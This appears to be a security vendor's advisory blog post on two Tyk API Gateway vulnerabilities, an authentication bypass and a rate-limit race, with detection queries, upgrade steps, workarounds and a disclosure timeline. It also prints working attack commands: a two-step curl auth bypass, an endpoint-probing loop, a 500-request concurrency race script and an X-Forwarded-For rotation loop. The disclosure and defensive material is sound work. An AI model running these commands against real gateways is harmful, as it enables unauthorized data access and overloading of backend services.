Two critical security flaws in Tyk API Gateway — an authentication token validation bypass (CVE-2026-31872) and a quota/rate limiting circumvention vulnerability (CVE-2026-31873) — allow unauthenticated attackers to access protected APIs and overwhelm backend services. All self-hosted Tyk deployments running versions 5.0–5.3 are affected. Patches are available in Tyk 5.3.5 and 5.4.0.
Tyk API Gateway, a popular open-source and commercial API management platform written in Go, has been found to contain two critical vulnerabilities affecting its authentication middleware and rate limiting subsystem. Disclosed on March 31, 2026, these flaws impact self-hosted Tyk Gateway versions 5.0.x through 5.3.4 and stem from logic errors in Tyk's custom middleware chain evaluation and Redis-based quota tracking.
Tyk Cloud (SaaS) deployments were silently patched on March 30, 2026. Organizations running self-hosted Tyk — including those using Tyk Operator on Kubernetes — must upgrade manually.
CVE-2026-31872 was added to CISA's Known Exploited Vulnerabilities catalog on April 1, 2026. Federal civilian agencies must patch by April 22, 2026. All organizations should treat this as P0. Exploit code is publicly available on GitHub as of April 2, 2026.
| CVE | Type | CVSS v3.1 | Severity | Affected Versions |
|---|---|---|---|---|
| CVE-2026-31872 | Authentication Token Bypass | 9.1 | Critical | Tyk Gateway 5.0.x – 5.3.4 |
| CVE-2026-31873 | Rate Limiting / Quota Bypass | 7.5 | High | Tyk Gateway 4.3.x – 5.3.4 |
CVE-2026-31872 is a critical flaw in Tyk's Go plugin middleware chain evaluation. When an API definition configures both a virtual endpoint and an authentication token policy simultaneously, Tyk's request processing pipeline evaluates the virtual endpoint handler before completing token validation. If the virtual endpoint returns a specific HTTP response pattern — specifically a 200 OK with an empty body — the auth middleware marks the request as pre-authenticated and forwards it to the upstream without verifying the provided bearer token.
The flaw lives in gateway/middleware/virtual_endpoint.go, where the Exec() method sets a shared context key ctx.PreAuthenticated = true under certain response conditions. This flag is then read by gateway/middleware/auth_key.go's ProcessRequest() to short-circuit token validation — a design that was intended for internal service-to-service calls but can be triggered externally.
| Metric | Value | Rationale |
|---|---|---|
| Attack Vector | Network | Fully remote exploitation over HTTPS |
| Attack Complexity | Low | No special configuration knowledge needed |
| Privileges Required | None | Unauthenticated attacker |
| User Interaction | None | No victim action required |
| Scope | Changed | Gateway compromise affects all upstream services |
| Confidentiality | High | Full access to all protected API resources |
| Integrity | High | Write access to backend via unfiltered requests |
| Availability | Low | Gateway itself remains functional |
Not every Tyk deployment is vulnerable. The authentication bypass is only triggerable when all three of the following conditions are present in an API definition:
auth_token or jwtTykJsResponse with Code: 200 and an empty or null BodyThe following demonstrates a two-step exploit: first triggering the virtual endpoint to poison the pre-auth flag, then immediately accessing a protected endpoint with an invalid token:
# Step 1: Trigger the virtual endpoint with an empty-body 200 response # This poisons the PreAuthenticated flag in Tyk's shared request context curl -i -X POST https://api.example.com/v1/virtual-endpoint \ -H "Authorization: Bearer INVALID_TOKEN_AAAA" \ -H "Content-Type: application/json" \ -d '{}' # Expected response from Step 1 (virtual endpoint processes before auth): # HTTP/2 200 # (empty body — this triggers the vulnerability) # Step 2: Immediately access any protected endpoint on the SAME API definition # with ANY bearer token — validation is skipped due to PreAuthenticated flag curl -i https://api.example.com/v1/admin/users \ -H "Authorization: Bearer INVALID_TOKEN_AAAA" \ -H "X-Request-ID: $(uuidgen)" # Vulnerable response: # HTTP/2 200 # {"users": [...]} ← Full data returned without valid auth # Automated scanner to identify vulnerable Tyk endpoints for path in /v1/users /v1/admin /v1/data /api/internal; do STATUS=$(curl -s -o /dev/null -w "%{http_code}" \ -H "Authorization: Bearer AAAA.BBBB.CCCC" \ "https://api.example.com${path}") echo "$path -> HTTP $STATUS" done
The following API definition pattern in Tyk's JSON config triggers the vulnerability. If your deployment contains APIs matching this structure, consider yourself at risk until patched:
// Vulnerable Tyk API definition (tyk-api-def.json) { "auth": { "auth_header_name": "Authorization", "use_param": false }, "use_keyless": false, "use_standard_auth": true, "extended_paths": { "virtual": [ { "response_function_name": "myVirtualFunc", "function_source_type": "inline", "path": "virtual-endpoint", "method": "POST", // If this function returns {Code:200, Body:""} → triggers bypass "function_source_value": "function myVirtualFunc(req, session, spec) { return TykJsResponse({Code: 200, Body: ''}, session.meta_data); }" } ] } }
CVE-2026-31873 is a race condition in Tyk's Redis-based quota and rate limiting implementation. When Tyk processes concurrent requests from the same API key, the quota check and quota decrement operations are performed in two separate, non-atomic Redis commands (GET followed by DECR). An attacker who sends requests in sufficiently high concurrency can read the same pre-decrement quota value across multiple goroutines, effectively multiplying their allowed request count by the number of concurrent connections.
This is a classic TOCTOU (Time-of-Check, Time-of-Use) vulnerability. In Tyk's Go code (storage/storage.go, the GetRawKey + DecrementWithExpire path), there is no Redis MULTI/EXEC transaction or WATCH-based optimistic lock around the check-then-decrement logic, allowing the quota state to be read stale under concurrent load.
The following bash script uses GNU parallel to fire 500 simultaneous requests against a Tyk-protected endpoint configured with a 50 req/min quota. On a vulnerable instance, the majority will succeed despite the limit:
#!/bin/bash # CVE-2026-31873 — Tyk Rate Limit TOCTOU Race PoC # Fires 500 concurrent requests to exhaust quota without triggering limits TARGET="https://api.example.com/v1/search" API_KEY="tyk-valid-api-key-here" CONCURRENCY=500 echo "Launching $CONCURRENCY concurrent requests..." seq 1 $CONCURRENCY | parallel -j $CONCURRENCY \ 'curl -s -o /dev/null -w "%{http_code}\n" \ -H "Authorization: '"$API_KEY"'" \ "'"$TARGET"'?q=test&page={}"' \ | sort | uniq -c # Expected on patched system: # 449 429 (rate limited) # 51 200 (within quota) # Expected on vulnerable system: # 498 200 (bypass successful — almost all requests pass) # 2 429 (only slowest requests get rate-limited)
On Tyk deployments where enable_ip_whitelisting is false and the gateway trusts X-Forwarded-For, the rate limiting key can also be fragmented by rotating the source IP header. This compounds with the TOCTOU race for a near-total quota bypass:
# Combine X-Forwarded-For rotation with concurrent requests
# Each unique IP gets its own rate limit bucket in Tyk's default config
for i in $(seq 1 1000); do
FAKE_IP="10.$((RANDOM % 256)).$((RANDOM % 256)).$((RANDOM % 256))"
curl -s -o /dev/null \
-H "Authorization: tyk-valid-api-key-here" \
-H "X-Forwarded-For: $FAKE_IP" \
"https://api.example.com/v1/data" &
(( i % 100 == 0 )) && wait
done
wait
| Deployment Type | CVE-2026-31872 Auth Bypass | CVE-2026-31873 Rate Bypass | Status |
|---|---|---|---|
| Tyk Cloud (SaaS) | Patched (Mar 30) | Patched (Mar 30) | Auto-updated |
| Self-hosted OSS (<5.3.5) | Vulnerable | Vulnerable | Manual upgrade required |
| Self-hosted Enterprise (<5.3.5) | Vulnerable | Vulnerable | Manual upgrade required |
| Tyk Operator (Kubernetes) | Vulnerable | Vulnerable | Helm chart update required |
| Tyk Gateway 5.3.5+ | Patched | Patched | Safe |
| Tyk Gateway 5.4.0+ | Patched | Patched | Safe |
Tyk logs authentication decisions in structured JSON. The following commands identify requests that bypassed token validation (authenticated without a valid key) and quota exhaustion anomalies:
# Find requests where auth succeeded but no API key was validated # These appear as requests with empty or placeholder auth_id fields cat /var/log/tyk/tyk.log \ | jq -r 'select(.level == "info" and .msg == "Proxy request") | select(.auth_id == "" or .auth_id == null)' \ | jq '{time: .time, path: .path, ip: .remote_addr, auth_id: .auth_id}' # Detect quota bypass: requests that succeeded after quota should be exhausted # Look for API keys with >N successful requests in the last minute cat /var/log/tyk/tyk.log \ | jq -r 'select(.code == 200) | .auth_id' \ | sort | uniq -c | sort -rn \ | awk '$1 > 100 { print "POTENTIAL_BYPASS: " $2 " — " $1 " successful requests" }' # Check Tyk version via the gateway HTTP API curl -s http://localhost:8080/hello | jq '.version'
Directly inspect Redis to verify whether rate limiting counters are being incremented correctly:
# Connect to your Tyk Redis instance and inspect quota keys redis-cli -h your-redis-host -p 6379 -a yourpassword # List all rate limit keys for a specific API key KEYS "quota-*your-api-key-prefix*" # Check a specific quota key's current value and TTL GET "quota-your-api-key-hash" TTL "quota-your-api-key-hash" # If the value is higher than your configured quota, exploitation may have occurred # Example: if quota is 100/min but counter shows 450, investigate immediately
The definitive fix is upgrading to Tyk Gateway 5.3.5 or 5.4.0. Both releases include an atomic Redis pipeline for quota operations and a rewrite of the virtual endpoint pre-auth flag handling.
# Docker — upgrade to patched image docker pull tykio/tyk-gateway:v5.3.5 docker stop tyk-gateway && docker rm tyk-gateway docker run -d --name tyk-gateway \ -v $(pwd)/tyk.conf:/opt/tyk-gateway/tyk.conf \ -v $(pwd)/apps:/opt/tyk-gateway/apps \ -p 8080:8080 \ tykio/tyk-gateway:v5.3.5 # Kubernetes via Helm — update Tyk Operator helm repo add tyk-helm https://helm.tyk.io/public/helm/charts/ helm repo update helm upgrade tyk-gateway tyk-helm/tyk-gateway \ --namespace tyk \ --set gateway.image.tag=v5.3.5 \ --reuse-values # Binary upgrade on Linux curl -L https://github.com/TykTechnologies/tyk/releases/download/v5.3.5/tyk-linux-amd64-v5.3.5.tar.gz \ -o tyk-v5.3.5.tar.gz tar -xzf tyk-v5.3.5.tar.gz sudo systemctl stop tyk-gateway sudo cp tyk /opt/tyk-gateway/tyk sudo systemctl start tyk-gateway # Verify version after upgrade curl -s http://localhost:8080/hello | jq '.version' # Expected: "v5.3.5" or "v5.4.0"
If immediate upgrade is not possible, disable virtual endpoints on any API definition that uses token authentication. Edit the API definition JSON and set the virtual path list to empty:
// In your Tyk API definition file — remove or empty the virtual endpoints list { "extended_paths": { "virtual": [] // ← Set to empty array to disable virtual endpoints } } # Apply via Tyk Dashboard API curl -X PUT https://your-tyk-dashboard:3000/api/apis/{api-id} \ -H "authorization: your-dashboard-user-key" \ -H "Content-Type: application/json" \ -d @patched-api-def.json # Or reload via hot-reload if using file-based config kill -SIGHUP $(pgrep tyk)
Until you can upgrade, enable Tyk's experimental enable_redis_rolling_limiter option, which uses a Lua-scripted atomic pipeline in Redis and is not vulnerable to the TOCTOU race:
// tyk.conf — enable atomic rolling rate limiter (available in Tyk 5.0+) { "enable_redis_rolling_limiter": true, "enable_sentinel_rate_limiter": false, "drl_notification_payload_size": 0, // Also restrict trusted IPs for X-Forwarded-For to block IP rotation bypass "allowed_ips": ["10.0.1.10", "10.0.1.11"], "enable_ip_whitelisting": true }
# Test 1: Verify auth bypass is fixed — should return 401 curl -i -X POST https://your-gateway.example.com/v1/virtual-endpoint \ -H "Authorization: Bearer INVALID_TOKEN_AAAA" \ -d '{}' # Expected on patched system: HTTP/2 401 Unauthorized # Test 2: Verify rate limiting enforces correctly for i in $(seq 1 60); do CODE=$(curl -s -o /dev/null -w "%{http_code}" \ -H "Authorization: Bearer your-valid-key" \ "https://your-gateway.example.com/v1/test") echo "Request $i: HTTP $CODE" done # After your quota limit, you should consistently see 429 Too Many Requests
max_conn_time and connection rate limits in your reverse proxy (nginx/Envoy) in front of Tyk to cap the concurrency available for exploitation.use_standard_auth: true and a non-empty virtual array.# Audit script: find all vulnerable API definitions (virtual + auth combo)
curl -s "https://your-dashboard:3000/api/apis?p=-1" \
-H "authorization: your-dashboard-key" \
| jq -r '.apis[] | select(
.api_definition.use_standard_auth == true and
(.api_definition.extended_paths.virtual | length > 0)
) | "VULNERABLE: " + .api_definition.name + " (" + .api_definition.api_id + ")"'
| Date | Event |
|---|---|
| 2026-02-20 | Both vulnerabilities reported to Tyk Security via security@tyk.io |
| 2026-02-22 | Tyk Security team acknowledges receipt; initiates investigation |
| 2026-03-05 | Root cause confirmed; CVE IDs requested from MITRE |
| 2026-03-15 | CVE-2026-31872 and CVE-2026-31873 assigned |
| 2026-03-28 | Tyk Gateway 5.3.5 and 5.4.0 release candidates distributed to enterprise customers |
| 2026-03-30 | Tyk Cloud (SaaS) automatically updated; public release of 5.3.5 |
| 2026-03-31 | Public security advisory published by Tyk |
| 2026-04-01 | CISA adds CVE-2026-31872 to KEV catalog |
| 2026-04-02 | Public exploit PoC released; active scanning observed across the internet |
AI-powered vulnerability management with 331,910+ CVEs indexed. Continuously monitor Tyk, Kong, and other API gateways for critical security flaws before attackers exploit them.
Start Free TrialStay secure. Stay vigilant.
🗡️ KENSAI Security Team
🛡️ Is your Tyk gateway secure?
Discover authentication bypass vulnerabilities and misconfigurations before attackers do.
Scan your API gateway for free →